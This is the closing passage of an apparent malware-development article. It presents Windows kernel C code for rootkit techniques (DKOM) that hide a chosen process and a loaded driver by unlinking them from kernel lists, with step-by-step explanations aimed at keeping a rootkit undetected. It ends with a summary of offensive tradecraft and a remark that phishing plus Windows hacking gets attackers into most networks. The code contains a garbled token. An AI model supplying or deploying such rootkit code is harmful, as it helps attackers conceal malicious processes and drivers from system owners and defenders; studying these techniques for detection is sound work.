currentList = currentList->Flink;
currentEProcess = CONTAINING_RECORD(currentList, EPROCESS, ActiveProcessLinks);
} while (currentList != ¤tEProcess->ActiveProcessLinks);
return STATUS_NOT_FOUND; // Process not found
}
HideProcess
, which hides a process using the DKOM technique. It takes the Process ID (PID) of the target process as an argument. Here’s how it works:
- It starts by obtaining the current
EPROCESS
structure for the executing driver usingPsGetCurrentProcess
. - The code then retrieves the offsets within the
EPROCESS
structure forUniqueProcessId
andActiveProcessLinks
. - It iterates through the list of active processes, comparing the PID of each process with the target PID. When it finds a match, it unlinks the process from the
ActiveProcessLinks
list, effectively hiding it. - The function returns
STATUS_SUCCESS
if it successfully hides the process. If the target process is not found, it returnsSTATUS_NOT_FOUND
.
Hiding a Driver
In addition to hiding processes, we can also employ the DKOM technique to hide drivers from the system. This is particularly useful in scenarios where a rootkit needs to remain undetected
// Function to hide a driver by manipulating data structures
NTSTATUS HideDriver(PDRIVER_OBJECT driverObject) {
KIRQL irql;
// Raise IRQL to DPC level
irql = KeRaiseIrqlToDpcLevel();
// Get the module entry from the DriverObject
PLDR_DATA_TABLE_ENTRY moduleEntry = (PLDR_DATA_TABLE_ENTRY)driverObject->DriverSection;
// Unlink the module entry
moduleEntry->InLoadOrderLinks.Blink->Flink = moduleEntry->InLoadOrderLinks.Flink;
moduleEntry->InLoadOrderLinks.Flink->Blink = moduleEntry->InLoadOrderLinks.Blink;
// Lower IRQL back to its original value
KeLowerIrql(irql);
return STATUS_SUCCESS;
}
HideDriver
function is designed to hide a driver by manipulating kernel data structures. Here’s a breakdown of how it works:
- It raises the IRQL (Interrupt Request Level) to DPC (Deferred Procedure Call) level using
KeRaiseIrqlToDpcLevel
. This is essential to ensure that the manipulation of kernel data structures is performed atomically and doesn’t interfere with ongoing system operations. - Next, it obtains the module entry by casting the
DriverSection
member of the provideddriverObject
to aPLDR_DATA_TABLE_ENTRY
. This provides access to information about the driver module. - It unlinks the module entry from the kernel’s internal linked lists. By manipulating the
InLoadOrderLinks
member of the module entry, it effectively removes the driver from the list of loaded modules. - Finally, it lowers the IRQL back to its original value using
KeLowerIrql
, allowing normal system operation to resume.
END
And that’s it! We’ve explored the essentials of malware development and offensive tradecraft. Thank you for reading, and I hope you’ve learned something valuable from this article. We’ve covered a wide range of topics, from dynamic function loading and process injection to advanced techniques like rootkits and Direct Kernel Object Manipulation (DKOM). I intentionally removed the shellcode development section to keep things simpler, but I may cover it in a separate article.
Throughout this I’ve included references to some great resources that helped shape this article. If you’re eager to dive deeper, I encourage you to explore them and continue building your skills.
‘Social engineering and phishing, combined with some operative knowledge about Windows hacking, should be enough to get you inside the networks of most organizations.
References and Credits
- Anatomy of the Process Environment Block (PEB) (Windows Internals
- Manipulating Active processlinks
- DLL Injection
- Kernel Mode Rootkits
- Enumerating RWX Protected Memory Regions for Code Injection
- Windows APT Warfare